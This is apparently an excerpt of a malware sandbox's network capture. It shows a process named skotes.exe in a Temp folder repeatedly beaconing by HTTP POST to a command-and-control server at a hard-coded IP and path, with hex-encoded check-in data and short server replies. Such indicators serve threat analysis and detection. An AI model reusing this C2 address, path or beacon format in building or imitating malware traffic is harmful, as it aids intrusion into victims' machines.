Nov 13, 2024 20:43:14.272233009 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50279	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:16.847999096 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:17.761852026 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50283	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:19.288855076 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:20.191447020 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50285	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:22.557074070 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:23.508312941 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50289	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:25.019428968 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:26.021625042 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50291	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:27.657654047 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:28.583446026 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50295	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:30.098562956 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:31.026910067 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50297	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:32.652357101 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:33.566472054 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50300	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:35.084563017 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:36.006079912 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50302	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:37.629731894 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:38.535619020 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50304	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:40.055157900 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:40.973784924 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50306	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:42.612063885 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:43.518271923 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50310	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:45.039417982 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:45.963988066 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50312	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:47.590677023 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:48.544305086 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50313	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:50.069168091 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:50.973408937 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50315	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:52.616225958 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:53.700774908 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50320	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:55.218430996 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:43:56.337965012 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50326	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:43:57.962125063 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:43:58.927695990 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:43:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50328	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:00.815879107 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:01.752856970 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50330	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:03.377974033 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:04.812823057 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 13, 2024 20:44:04.812839031 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 13, 2024 20:44:04.813785076 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50332	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:06.334465027 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:44:07.240508080 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50333	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:09.227293015 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:44:10.132348061 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:44:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50337	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:44:11.653213024 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
